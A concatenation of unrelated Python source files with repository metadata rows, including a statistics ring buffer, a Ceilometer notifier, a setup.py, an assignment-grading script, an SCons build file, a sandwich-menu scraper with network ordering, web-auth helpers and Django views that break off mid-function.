        ('born', np.uint16),
        ('random', np.uint16),
        ('deaths', np.uint16),
        ('attacking_sum', np.uint16),
        ('attacked_ok_sum', np.uint16),
        ('eating_sum', np.uint16),
        ('ready_to_born', np.uint16),
        ('primary_color_histogram_0', np.uint16),
        ('primary_color_histogram_1', np.uint16),
        ('primary_color_histogram_2', np.uint16),
        ('primary_color_histogram_3', np.uint16),
        ('primary_color_histogram_4', np.uint16),
        ('primary_color_histogram_5', np.uint16),
        ('primary_color_histogram_6', np.uint16),
        ('primary_color_histogram_7', np.uint16),
    )
    @classmethod
    def for_shape(self, shape):
        # Build a zeroed recarray with one field per metric, wrap it in a
        # Statistics frame and start the ring pointer at row 0.
        dtype = [(n,t) for n, t in self._stats_fields]
        data = np.recarray(shape, dtype=dtype)
        data[:] = 0
        stats = Statistics(data=data)
        stats._pointer = 0
        return stats
    #def __init__(self, *args, **kwargs):
    #    self._pointer = 0
    #    super(Statistics, self).__init__(*args, **kwargs)
    def _get_current(self):
        # The row currently being written.
        return self.ix[self._pointer]
    def history(self):
        # TODO: there is copying here anyway -- maybe it would be better
        # to append at the end and trim from the beginning instead?
        # Rows after the pointer are the oldest entries (once the buffer
        # has wrapped), so this returns rows in chronological order with
        # the current row last.
        history = self.ix[self._pointer+1:]
        history = history.append(self.ix[0:self._pointer+1])
        return history
    def _set_current(self, values):
        if not isinstance(values, pd.Series):
            values = pd.Series(values)
        self.ix[self._pointer] = values
    current = property(_get_current, _set_current)
    def advance_frame(self):
        # Circular advance; zero out the new current row.
        self._pointer = (self._pointer + 1) % self.shape[0]
        self.current = 0
    def log(self, **data):
        self.current = data
        # print self.current
|
UTF-8
|
Python
| false | false | 2,013 |
11,020,886,089,993 |
053f6bcc55bc143eb96ba19e562d2daec5354602
|
e476f9ac2aef7a2e0f84f0d7a7b1c9fee53e052e
|
/ceilometer/compute/nova_notifier.py
|
0cd6edd8823ca886cbf366e34c9ffc6f58d29771
|
[] |
no_license
|
jcru/ceilometer
|
https://github.com/jcru/ceilometer
|
ac9cda2a131a7507b1a2bb888452b8bd1cbb6bde
|
40376ef9199034e9078333565863cff9f8228667
|
refs/heads/master
| 2020-12-25T00:06:29.674010 | 2012-09-26T13:04:20 | 2012-09-26T13:04:20 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- encoding: utf-8 -*-
#
# Copyright © 2012 New Dream Network, LLC (DreamHost)
#
# Author: Julien Danjou <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import db
from ceilometer.compute.manager import AgentManager
class CeilometerNovaNotifier(object):
    """Special notifier for Nova, doing special jobs for Ceilometer."""

    def __init__(self):
        # One agent manager per notifier; used to poll instances.
        self.manager = AgentManager()
        self.manager.init_host()

    def __call__(self, context, message):
        # Only the start of an instance deletion is interesting: poll the
        # instance one last time before it disappears.
        if message['event_type'] != 'compute.instance.delete.start':
            return
        instance_id = message['payload']['instance_id']
        instance = db.instance_get(context, instance_id)
        self.manager.poll_instance(context, instance)
# Module-level singleton created at import time; presumably referenced
# by Nova's notification-driver configuration -- verify against deployment.
notify = CeilometerNovaNotifier()
|
UTF-8
|
Python
| false | false | 2,012 |
3,539,053,097,795 |
1f617bb73fc429a87e05c2c851b97236c7d1c70e
|
94a2be4f4cf38269ee052fcef411e85d699b437d
|
/setup.py
|
444c2653de62983c48fea5dcb5e836a58ac23471
|
[
"MIT"
] |
permissive
|
pombredanne/spydey
|
https://github.com/pombredanne/spydey
|
c812641ca8e634cf9c2c6ec6ae557eb82d467b84
|
ee296a911a2196efe83de04deb6bcb325b2ce076
|
refs/heads/master
| 2021-01-17T08:33:23.253301 | 2010-12-15T21:49:09 | 2010-12-15T21:49:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from setuptools import setup, find_packages
import sys, os
version = '0.3'
README = open(os.path.join(os.path.dirname(__file__), 'README.txt')).read()
setup(name='spydey',
version=version,
description="A simple web spider with pluggable recursion strategies",
long_description=README,
classifiers=[
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Site Management :: Link Checking',
], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers
keywords='',
author='Paul M. Winkler',
author_email='[email protected]',
url='http://github.com/slinkp/spydey',
license='MIT',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=[
# -*- Extra requirements: -*-
'httplib2',
'lxml',
],
entry_points="""
# -*- Entry points: -*-
[console_scripts]
spydey=spydey.spider:main
""",
)
|
UTF-8
|
Python
| false | false | 2,010 |
15,882,789,109,573 |
88140572a2f2af90cbcfea71b14d97dfa1294c94
|
edbfe6d4e8f9a93f6b64ad8b02b504f81bf1f33c
|
/assignment_6/assignment6.py
|
b95fbd8b1707be8890a87627d6da0d561b1621de
|
[] |
no_license
|
awickham/303E-grading-scripts
|
https://github.com/awickham/303E-grading-scripts
|
afcb13f203318cdbbf34e7dca06d451dde1d0f4d
|
4f40e5317ec829c3219e411d825829d8cd9783b8
|
refs/heads/master
| 2020-05-29T12:16:27.394080 | 2014-05-05T17:58:01 | 2014-05-05T17:58:01 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from os.path import os, exists
from datetime import datetime, timedelta
from functools import *
import subprocess
import sys
import re
import difflib
# Expected outputs, one per test case; drop the empty trailing element
# produced by the file's final newline.
correct = open('correct.txt', 'r').read().split("\n")
correct = correct[0:-1]
# Per-student results are appended here as tab-separated rows.
outputFilename = 'assignment6.txt'
outputFile = open(outputFilename, 'w+')
outputFile.write('CSID\tGrade\tComments\n')
# Submission filename students were asked to use.
filename = "Hailstone.py"
# Presumably the assignment deadline, consumed by isLate() (defined
# elsewhere) -- verify.
dateString = "03-05-2014 23:00:00"
inputArray = open('input.txt','r').read().split("\n")
def main():
    """Grade a range of CSIDs (two args: bounds) or a single CSID (one arg)."""
    listing = subprocess.getoutput('ls ./')
    CSIDS = listing.split("\n")
    # Batch mode: grade every CSID whose first letter is in [lower, upper].
    if len(sys.argv) == 3:
        lowerBound = sys.argv[1]
        upperBound = sys.argv[2]
        selected = []
        done = 0
        for item in CSIDS :
            if ord(item[0]) in range(ord(lowerBound), ord(upperBound)+1) :
                # CSID entries are extension-less; skip regular files.
                if "." not in item :
                    selected.append(item)
        for csid in selected :
            done += 1
            os.system('clear')
            print('======================')
            print(csid + " " + str(done) + " out of " + str(len(selected)))
            print('======================')
            assign6(csid, True)
    #singleton mode
    else:
        csid = sys.argv[1]
        os.system('clear')
        print('======================')
        print(csid)
        print('======================')
        assign6(csid, False)
    outputFile.close()
def assign6( csid , writeToFile) :
    """Grade one student's assignment-6 submission.

    Side effects: chdirs into the ``csid`` directory and back out, runs the
    student's program under python3, prompts the grader interactively, and
    (when *writeToFile* is true) appends a tab-separated grade line to the
    module-level ``outputFile``.  Relies on module globals ``filename``,
    ``inputArray``, ``correct`` and ``outputFile`` -- defined elsewhere in
    this script.
    """
    fileToGrade = ""
    late = 0
    grade = 70        # correctness portion starts at 70; deductions subtract
    style = 30        # style portion, graded manually out of 30
    wrongFileName = False
    header = True
    comments = " "
    os.chdir(csid)
    if writeToFile: outputFile.write(csid + "\t")
    files = os.listdir('.')
    #filename checking
    for f in files :
        # `ls -l` output is split so isLate() can read the modification date
        splitted = subprocess.getoutput('ls -l ' + f).split()
        if f == filename :
            fileToGrade = filename
            late = isLate(splitted)
            break
        elif f == filename.lower() :
            fileToGrade = filename.lower()
            late = isLate(splitted)
            wrongFileName = True
            break
    #really odd filename
    if fileToGrade == "" :
        print(subprocess.getoutput('ls -l'))
        fileToGrade = input("Which file should I grade? ")
        if fileToGrade == "" :
            if writeToFile:
                outputFile.write("0\tno file\n")
            os.chdir("..")
            return
        else :
            # escape spaces so the shell sees a single path argument
            splitted = subprocess.getoutput('ls -l ' + fileToGrade.replace(' ','\ ')).split()
            late = isLate(splitted)
            wrongFileName = True
    #grading time!
    if not fileToGrade == "" and late != -1:
        answers = []
        # Run the student's program once per test case, feeding the test's
        # whitespace-separated values on stdin, one per line.
        for x in range(len(inputArray)):
            process = subprocess.Popen(['python3', fileToGrade], stdin = subprocess.PIPE, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
            try:
                out = process.communicate(bytes('\n'.join(inputArray[x].split()) + '\n', 'UTF-8'))[0]
            except KeyboardInterrupt:
                # lets the grader Ctrl-C past a hung student program
                pass
            # str(bytes) looks like b'...'; slice off the b' prefix and ' suffix
            answers.append(str(out)[2:-1])
        count = 0
        perfectCount = 0
        closeCount = 0
        wrongCount = 0
        for answer, cor in zip(answers,correct):
            cor = cor.split()
            #extracting relevant data form the students output
            nums = re.findall("\D+(\d+)\D+(\d+)", answer)
            if len(nums) != 1:
                wrongCount += 1
                continue
            elif len(nums[0]) != 2:
                wrongCount += 1
                continue
            longNum = int(nums[0][0])
            cycleLength = int(nums[0][1])
            #perfect check
            if count >= 6: #negative testing time!
                perfect = "Enter starting number of the range: \nEnter ending number of the range: \n" * 6 +"The number " + str(cor[0]) + " has the longest cycle length of " + str(cor[1]+".")
            else:
                perfect = "Enter starting number of the range: \nEnter ending number of the range: \nThe number " + str(cor[0]) + " has the longest cycle length of " + str(cor[1]+".")
            # the captured output has literal backslash-n sequences; turn them
            # back into newlines before the byte-for-byte comparison
            if perfect == answer.replace('\\n','\n').rstrip('\n'):
                print('Perfect answer for #', count + 1)
                perfectCount +=1
            elif longNum == int(cor[0]) and cycleLength == int(cor[1]):
                # right numbers, wrong surrounding text/prompts
                print('Close answer for #', count + 1)
                print(perfect+"\n\tvs.\n\t"+answer.replace('\\n','\n\t'))
                closeCount += 1
            else:
                print('Wrong answer for #', count + 1)
                print(perfect+"\n\tvs.\n\t"+answer.replace('\\n','\n\t'))
                wrongCount += 1
            count += 1
        print("Perfect:", str(perfectCount) + "/10")
        print("Close:", str(closeCount) + "/10")
        print("Wrong:", str(wrongCount) + "/10")
        if wrongCount != 0 or closeCount != 0:
            # default deduction: 3 points per wrong case; grader may override
            suggested_deduction = 3*wrongCount
            deduction = input("How much to deduct for this output? Enter number or " +
                              "hit enter for suggested deduction (-" +
                              str(suggested_deduction) + "): ")
            if not deduction.isdigit() :
                deduction = suggested_deduction
            else :
                deduction = int(deduction)
            grade -= deduction
            comments += " Output did not match instructor's. Perfect: " + \
                str(perfectCount) + " Close: " + str(closeCount) + \
                " Wrong: " + str(wrongCount) + " (-" + str(deduction) + "). "
        #checking for header and style
        #os.system('vim ' + fileToGrade)
        input("Hit Enter to cat")
        print(subprocess.getoutput('cat ' + fileToGrade))
        headerInput = input("Header( (y or enter) / n)? ")
        if headerInput == 'y' or headerInput == '' :
            header = True
        else :
            header = False
        style = input("Style/Comments (Enter a number out of 30 to represent their grade, hit enter for 30): ")
        comments += input ("General Comments?: ")
        if not style.isdigit() :
            style = 30
        else :
            style = int(style)
    #writing grade time!
    if late == -1:
        # isLate() returned -1: more than 7 days late, automatic zero
        if writeToFile: outputFile.write('0\t More than 7 days late')
    else :
        if late == 3:
            comments += " 3 - 7 days late (-30). "
            grade -= 30
        elif late == 2 :
            comments += " 2 days late (-20). "
            grade -= 20
        elif late == 1 :
            comments += " 1 day late (-10). "
            grade -= 10
        if wrongFileName :
            comments += " Wrong filename (-10). "
            grade -= 10
        if not header :
            comments += " No/malformed header (-10). "
            grade -= 10
        if writeToFile: outputFile.write(str(grade+style) + "\t"+comments)
    if writeToFile: outputFile.write('\n')
    os.chdir("..")
#returns the number of days late an assignment is
def isLate( splitted ):
    """Classify a submission's lateness from a split `ls -l` line.

    Returns 0 (on time), 1 or 2 (one/two days late), 3 (three to seven days
    late) or -1 (more than seven days past due).  Uses the module-level
    ``dateString`` as the deadline; the year is hard-coded to 2014 because
    `ls -l` omits it for recent files.
    """
    deadline = datetime.strptime(dateString, "%m-%d-%Y %H:%M:%S")
    # `ls -l` prints single-digit days without a leading zero; pad for strptime
    day = splitted[6] if len(splitted[6]) != 1 else "0" + splitted[6]
    submitted = datetime.strptime(
        splitted[5] + " " + day + " " + splitted[7] + " 2014", "%b %d %H:%M %Y")
    # ordered lateness buckets: (grace in days, code to return)
    for grace, code in ((0, 0), (1, 1), (2, 2), (7, 3)):
        if submitted <= deadline + timedelta(days=grace):
            return code
    return -1
main()
|
UTF-8
|
Python
| false | false | 2,014 |
987,842,500,082 |
2023a03985577ec9b47704c263762a11e8b0a5b8
|
6ac4e8ee1d4f5df92815c4337a1c956300a8d857
|
/se34euca/runtest_snapshot.py
|
92eb29ae85ba8960b29a928a264793f94aad8a43
|
[] |
no_license
|
aliceh/se34euca
|
https://github.com/aliceh/se34euca
|
a8c7b88a6be5597f772a6cadb74e59befa7c43a8
|
6e993c5b77e8de6a68f6f575964bc86e335336e8
|
refs/heads/master
| 2021-01-17T21:54:17.328915 | 2014-10-21T18:43:33 | 2014-10-21T18:43:33 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/python
import se34euca
from se34euca.testcase.testcase_snapshot import testcase_snapshot
class Snapshot(se34euca.TestRunner):
    """Runner wiring the "delete_snapshot" case to its test class.

    NOTE(review): the se34euca.TestRunner base class presumably reads the
    ``testcase`` and ``testclass`` attributes to drive the run -- confirm
    against the base class, which is not visible here.
    """
    testcase = "delete_snapshot"
    testclass = testcase_snapshot
if __name__ == "__main__":
    # Run the snapshot test only when invoked directly as a script.
    Snapshot().start_test()
|
UTF-8
|
Python
| false | false | 2,014 |
17,394,617,582,442 |
7261efedfd7f3ffe6e6a6a6c371c2abb8444a9f2
|
a6402c8b624cbfa4d476b0a33df611d5ad9c7c3f
|
/runserver.py
|
3adb1c36adf5a4a81842a1f5f3f1c2f5eebc4464
|
[] |
no_license
|
dancaron/flask-bootstrap
|
https://github.com/dancaron/flask-bootstrap
|
8ea92d50f6d4e1b9c507bd75734689b7cc2e5a23
|
1476fb4cf5dc132f0378fe4b3b57283efa6c68e3
|
refs/heads/master
| 2016-08-03T18:13:35.686043 | 2014-03-09T22:22:19 | 2014-03-09T22:22:19 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from yourapplication import app
# This script will start the Flask dev server on port 5000
if __name__ == "__main__":
    # Dev server on port 5000 (Flask default), bound to all interfaces.
    # NOTE(review): debug=True together with host="0.0.0.0" exposes the
    # interactive Werkzeug debugger to the network -- development use only.
    app.run(debug=True, host="0.0.0.0")
|
UTF-8
|
Python
| false | false | 2,014 |
12,876,311,963,425 |
f529cd5e0482e48bc7c3d82829973b2ffbb25f06
|
a17d40d4bb54f1e010f6f86d37e5cd58c4346a79
|
/vendedores/views.py
|
a624ac94ec646e015fe6419ff75295c0241b9213
|
[] |
no_license
|
cdocarmo/cdmanager
|
https://github.com/cdocarmo/cdmanager
|
47b1662cedca6e39b2598ead5bfc6fd3267a784e
|
19ac639c9708d82015aa081b2616aebe4d173bba
|
refs/heads/master
| 2021-01-02T23:08:10.142229 | 2014-07-11T17:15:55 | 2014-07-11T17:15:55 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Create your views here.
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from vendedores.models import Vendedor, PedidoNoEnviado
from django.db.models import Q
from django.http import Http404, HttpResponse
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
import json
from django.core import serializers
import string
def cargo_vendedores(request):
    """Return every Vendedor, ordered by name, serialized as a JSON array.

    Fix: the response charset was misspelled ("uft8"); corrected to "utf8".
    """
    vendedores = Vendedor.objects.all().order_by("nombre")
    data = serializers.serialize("json", vendedores)
    return HttpResponse(data, mimetype="application/json; charset=utf8")
def diferenacia_pedido(request, xVend):
    """Return the unseen (visto=False) pending orders of vendor *xVend* as JSON.

    Fix: the response charset was misspelled ("uft8"); corrected to "utf8".
    """
    xDif = PedidoNoEnviado.objects.filter(vendedor__codigo=xVend, visto=False)
    data = serializers.serialize("json", xDif)
    return HttpResponse(data, mimetype="application/json; charset=utf8")
|
UTF-8
|
Python
| false | false | 2,014 |
6,098,853,563,722 |
8b2d01794ac00e0dc1221bc8cd7b9b918e7c77c7
|
3588da6eec1ac1a5487313a3655a2d70a9446ae2
|
/src/SConscript
|
ffb40601a4567255184a45c0b84d941f05dcd9cf
|
[
"GPL-1.0-or-later",
"GPL-3.0-only"
] |
non_permissive
|
NiLSPACE/hCraft
|
https://github.com/NiLSPACE/hCraft
|
7c21574b3339a6db8b3ac85e35fc68845ad3c748
|
50730a476b5fc3a34bdc47de1d3056db92a63c14
|
refs/heads/master
| 2020-04-03T03:49:16.719069 | 2012-12-08T10:24:02 | 2012-12-08T10:24:02 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Source files compiled into the hCraft server binary.
hCraft_sources = Split("""
main.cpp
logger.cpp
server.cpp
player.cpp
playerlist.cpp
packet.cpp
scheduler.cpp
entity.cpp
position.cpp
chunk.cpp
world.cpp
blocks.cpp
worldgenerator.cpp
flatgrass.cpp
stringutils.cpp
wordwrap.cpp
threadpool.cpp
worldprovider.cpp
hwprovider.cpp
utils.cpp
rank.cpp
permissions.cpp
messages.cpp
nbt.cpp
window.cpp
items.cpp
slot.cpp
sql.cpp
lighting.cpp
commands/command.cpp
commands/help.cpp
commands/me.cpp
commands/ping.cpp
commands/wcreate.cpp
commands/wload.cpp
commands/world.cpp
commands/tp.cpp
commands/nick.cpp
commands/wunload.cpp
commands/physics.cpp
physics/sand.cpp
""")

# System libraries the binary links against (Split tokenizes on whitespace).
hCraft_libs = Split("""
pthread
event
m
yaml-cpp
z
sqlite3
""")

# 'env' is the construction environment exported by the parent SConstruct.
Import('env')
env.Program(target = 'hCraft', source = hCraft_sources, LIBS = hCraft_libs)
|
UTF-8
|
Python
| false | false | 2,012 |
7,730,941,152,849 |
1f796a13d4f8443ad30c886f404e9ce4c95865be
|
f654a2896cce25b1de0f9a148fd8961335906d18
|
/pret/main.py
|
b5e98a31f521b44351f0b51d4e6f8fc2af0c4bb6
|
[] |
no_license
|
JNRowe-retired/pret-a-manger
|
https://github.com/JNRowe-retired/pret-a-manger
|
3a7316ffbf0fa85cdc4f0546c90ce78303304c0c
|
8f3297136026e27cfa9b8af42687ea0be104dea4
|
refs/heads/master
| 2020-04-11T03:00:55.364656 | 2013-05-31T16:29:54 | 2013-05-31T16:29:54 | 10,409,811 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import socket
import thread
import time
__author__ = 'Rachid Belaid'
import urllib2
from bs4 import BeautifulSoup
from termcolor import colored
def display_menu(kcal):
    """Scrape pret.com/menu, print it, and return it as a list of tuples.

    Each entry is ``(name,)`` or ``(name, kcal)`` when *kcal* is true; the
    kcal value costs one extra HTTP request per food item.  Python 2 code
    (print statement, urllib2).
    """
    page = urllib2.urlopen("http://pret.com/menu/")
    soup = BeautifulSoup(page, "html.parser")
    product_categories = soup.find_all('div', {"class": "product_category"})
    menu = []
    for product_category in product_categories:
        # category name is carried by the image's alt text
        category = product_category.img['alt']
        foods = product_category.find_all('a')
        for food in foods:
            if kcal:
                # follow the food's own page and read the first nutrition cell
                page = urllib2.urlopen('http://pret.com/%s' % food['href'])
                food_page = BeautifulSoup(page, "html.parser")
                food_kcal = food_page.find_all('td', {"class": "nutr_value"})[0].text
                food_tuple = (food.text, food_kcal)
            else:
                food_tuple = (food.text,)
            menu.append(food_tuple)
            # printed trailing number is the item's 1-based menu index
            display = ("%s %s %s") % (colored("[%s]" % category.upper(), 'yellow'),
                food_tuple[0],
                (colored("(%s kcal)" % food_tuple[1], 'red') if kcal else ''),
                )
            print "%s %s" % (display.ljust(90, '.'), (colored("[%s]" % len(menu), 'green')))
    return menu
def wait_to_order():
    """Block until a hunger broadcast arrives on UDP port 8881.

    Returns the sender's IP address as a string.
    """
    my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    my_socket.bind(('', 8881))
    print 'Waiting for somebody to collect order ...'
    order_server = None
    while not order_server:
        # NOTE: 8881 here is the recvfrom buffer size, not a port number
        message, address = my_socket.recvfrom(8881)
        order_server = str(address[0])
    return order_server
def broadcast():
    """Broadcast an "I m hungry" UDP datagram on port 8881 once a second.

    Never returns; main() runs it in a background thread.  A fresh socket is
    created on every iteration and never closed -- NOTE(review): one socket
    created outside the loop would suffice.
    """
    while True:
        my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        my_socket.sendto('I m hungry', ('<broadcast>', 8881))
        time.sleep(1)
def start_server():
    """Serve order collection over XML-RPC on port 8000 (blocks forever).

    Registers two methods: ``who`` (returns the collector's name) and
    ``order`` (prints a client's basket and acknowledges it).
    """
    from SimpleXMLRPCServer import SimpleXMLRPCServer  # Python 2 stdlib module
    name = raw_input('What is your name --> ')
    def order(name, baskets):
        # prints each ordered item; the parameter *name* (the client's name)
        # shadows the collector's name captured above
        for item in baskets:
            print ("%s %s") % (colored('[%s]' % name, 'green'), colored('%s' % item, 'yellow'))
        return True
    def who():
        # closure over the collector's name entered above
        return name
    server = SimpleXMLRPCServer((socket.gethostbyname(socket.gethostname()), 8000), logRequests=False)
    print "Listening order ..... "
    server.register_function(who, "who")
    server.register_function(order, "order")
    server.serve_forever()
def main():
    """CLI entry point.

    ``-l`` runs collector mode (broadcast + XML-RPC server); otherwise the
    menu is scraped and, unless ``-m`` was given, an interactive order is
    placed against the first collector that broadcasts.
    """
    from optparse import OptionParser
    parser = OptionParser()
    parser.add_option("-k", "--kcal",
        action="store_true", dest="kcal", default=False,
        help="print the kcal associate in the menu")
    parser.add_option("-m", "--menu", action="store_true", dest="menu", default=False,
        help="listen the menu only")
    parser.add_option("-l", "--listen", action="store_true", dest="listen", default=False,
        help="listen order of pret.com menu")
    (options, args) = parser.parse_args()
    if options.listen:
        # collector: announce ourselves over UDP, then serve orders via XML-RPC
        thread.start_new_thread(broadcast, ())
        start_server()
    else:
        menu = display_menu(options.kcal)
        if not options.menu:
            # wait for a collector's broadcast, then order through its proxy
            order_server = wait_to_order()
            import xmlrpclib
            proxy = xmlrpclib.ServerProxy("http://%s:8000/" % order_server)
            listener = proxy.who()
            name = raw_input('What is your name --> ')
            checkout = False
            baskets = []
            while not checkout:
                # items are picked by their 1-based menu index
                order = raw_input('What do you want to order --> ')
                if not order.isdigit():
                    continue
                order = int(order)
                conf = ''
                while not str(conf).upper() in ['Y', 'N']:
                    conf = raw_input('Do you confirm the "%s" ? (Y/N) --> ' % menu[int(order) - 1][0])
                if str(conf).upper() == 'Y':
                    baskets.append(menu[order - 1])
                checkout = True if str(
                    raw_input('Do you want to order something else ? (Y/N)--> ')).upper() == 'N' else False
            print "ORDER RESUME".center(60, "=")
            for item in baskets:
                print item[0]
            # NOTE(review): any non-empty answer (including "N") is truthy
            # here, so the order is sent unless the reply is an empty string
            send = raw_input('Do you want to send this order ? (Y/N)--> ')
            if send:
                if proxy.order(name, baskets):
                    print "ORDER RECEIVED BY %s" % listener
if __name__ == '__main__':
    # run the CLI only when executed directly
    main()
|
UTF-8
|
Python
| false | false | 2,013 |
3,058,016,744,632 |
d8afaee250a6650fc7b04d46cbfc2729ecf9e80e
|
04ae786a0eeb4f30099eb4400a7ae8d1acbadb26
|
/horus/lib.py
|
793d4d24429829629ec6903253a149d8db846da8
|
[] |
no_license
|
ccomb/horus
|
https://github.com/ccomb/horus
|
e4e355083b8f0addbfadfd876fc5ee7976011c5c
|
07492431458acb5c7ee8506d5f458fc99f9c9c1e
|
refs/heads/master
| 2016-10-13T15:27:54.409959 | 2012-06-30T21:14:29 | 2012-06-30T21:14:29 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from pyramid.security import unauthenticated_userid
from horus.interfaces import IHorusSession
from horus.interfaces import IHorusUserClass
import hashlib
import random
import string
def generate_random_string(length):
    """Generate a generic hash key for the user to use"""
    # Python 2 code (xrange/unicode).  Builds a random ASCII-letter word of
    # *length* characters, hashes it with SHA-256 and returns the first
    # *length* hex digits as a unicode string.
    # NOTE(review): uses the non-cryptographic `random` module; `os.urandom`
    # or (py3) `secrets` would be appropriate for security-sensitive tokens.
    m = hashlib.sha256()
    word = ''
    for i in xrange(length):
        word += random.choice(string.ascii_letters)
    m.update(word)
    return unicode(m.hexdigest()[:length])
def get_session(request):
    """Return the DB session registered under IHorusSession in the registry."""
    session = request.registry.getUtility(IHorusSession)
    return session
def get_user(request):
    """Resolve the current user, or fall through to an implicit None.

    Looks up the unauthenticated user id on the request and resolves it via
    the user class registered under IHorusUserClass.
    """
    pk = unauthenticated_userid(request)
    user_class = request.registry.queryUtility(IHorusUserClass)
    if pk is not None:
        return user_class.get_by_pk(request, pk)
def get_class_from_config(settings, key):
if key in settings:
user_modules = settings.get(key).split('.')
module = '.'.join(user_modules[:-1])
klass = user_modules[-1]
imported_module = __import__(module, fromlist=[klass])
imported_class = getattr(imported_module, klass)
return imported_class
else:
raise Exception('Please provide a %s config option' % key)
def pluralize(singular):
    """Return the plural form of the given lowercase English *singular* word.

    Irregular nouns are looked up in a fixed table; everything else goes
    through simple suffix rules (y -> ies, s/ch/sh -> es, the Latin
    -ius -> -i ending, plain +s otherwise).  The empty string pluralizes
    to the empty string.  Based on ActiveState recipe 413172.
    """
    irregular = {
        'appendix': 'appendices',
        'barracks': 'barracks',
        'cactus': 'cacti',
        'child': 'children',
        'criterion': 'criteria',
        'deer': 'deer',
        'echo': 'echoes',
        'elf': 'elves',
        'embargo': 'embargoes',
        'focus': 'foci',
        'fungus': 'fungi',
        'goose': 'geese',
        'hero': 'heroes',
        'hoof': 'hooves',
        'index': 'indices',
        'knife': 'knives',
        'leaf': 'leaves',
        'life': 'lives',
        'man': 'men',
        'mouse': 'mice',
        'nucleus': 'nuclei',
        'person': 'people',
        'phenomenon': 'phenomena',
        'potato': 'potatoes',
        'self': 'selves',
        'syllabus': 'syllabi',
        'tomato': 'tomatoes',
        'torpedo': 'torpedoes',
        'veto': 'vetoes',
        'woman': 'women',
    }
    vowels = frozenset('aeiou')

    if not singular:
        return ''
    special = irregular.get(singular)
    if special is not None:
        return special
    try:
        last, second_last = singular[-1], singular[-2]
    except IndexError:
        # one-letter word: no second-to-last character, just append 's'
        return singular + 's'
    if last == 'y' and second_last not in vowels:
        # consonant + y: dolly -> dollies
        return singular[:-1] + 'ies'
    if last == 's':
        if second_last not in vowels:
            # pass -> passes
            return singular + 'es'
        if singular[-3:] == 'ius':
            # genius -> genii
            return singular[:-2] + 'i'
        # jones -> joneses
        return singular[:-1] + 'ses'
    if singular[-2:] in ('ch', 'sh'):
        # church -> churches
        return singular + 'es'
    return singular + 's'
|
UTF-8
|
Python
| false | false | 2,012 |
4,355,096,877,767 |
4a207d84a2eb2ab3d043a56966376eb56f70eadb
|
68b26e6324e10f21bf2562f4d31325f34201a735
|
/cthulhubot/views.py
|
ca713c083810abf2c32e8403069529f55dedc2dd
|
[] |
no_license
|
centrumholdings/cthulhubot
|
https://github.com/centrumholdings/cthulhubot
|
63a8ee3766258d5fbd19bff26d6f54c982159d5f
|
38f6b98a02947973784b2ed2914d388b3d767a14
|
refs/heads/master
| 2020-04-06T21:38:29.307064 | 2011-10-19T10:56:26 | 2011-10-19T10:56:26 | 906,733 | 2 | 1 | null | false | 2013-09-14T14:10:02 | 2010-09-13T09:10:38 | 2013-07-21T03:04:10 | 2011-10-20T10:06:15 | 156 | null | 0 | 0 |
Python
| null | null |
from django.http import HttpResponse, HttpResponseNotFound, Http404, HttpResponseRedirect, HttpResponseBadRequest
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.db import transaction
from django.shortcuts import get_object_or_404
from django.views.generic.simple import direct_to_template
from anyjson import serialize, deserialize
from pymongo.objectid import ObjectId
from pymongo import DESCENDING
from pickle import dumps as pickle_dumps
from djangohttpdigest.decorators import protect_digest_model
from cthulhubot.bbot import create_master, BuildForcer
from cthulhubot.commands import get_undiscovered_commands
from cthulhubot.forms import CreateProjectForm, ComputerForm, get_build_computer_selection_form, get_job_configuration_form, get_command_params_from_form_data, get_scheduler_form
from cthulhubot.jobs import get_undiscovered_jobs
from cthulhubot.models import BuildComputer, Project, Job, Command, JobAssignment, ProjectClient, Buildmaster
from cthulhubot.mongo import get_database_connection
from cthulhubot.project import create_project
from cthulhubot.utils import dispatch_post
########### Helper controller-model dispatchers
def create_master(post, project, **kwargs):
    """Dispatch target: build a buildmaster for *project*, then redirect.

    Bug fix: this function shadows the ``create_master`` imported from
    ``cthulhubot.bbot`` at module level, so the original body recursed into
    itself forever instead of creating anything.  The real helper is
    imported locally under an alias to break the cycle.
    """
    from cthulhubot.bbot import create_master as bbot_create_master
    bbot_create_master(project = project)
    return HttpResponseRedirect(reverse("cthulhubot-project-detail", kwargs={
        "project" : project.slug,
    }))
def start_master(post, project, **kwargs):
    """Dispatch target: boot the project's buildmaster, then show the project."""
    project.buildmaster.start()
    detail_url = reverse("cthulhubot-project-detail",
                         kwargs={"project": project.slug})
    return HttpResponseRedirect(detail_url)
def stop_master(post, project, **kwargs):
    """Dispatch target: stop the project's buildmaster, then show the project."""
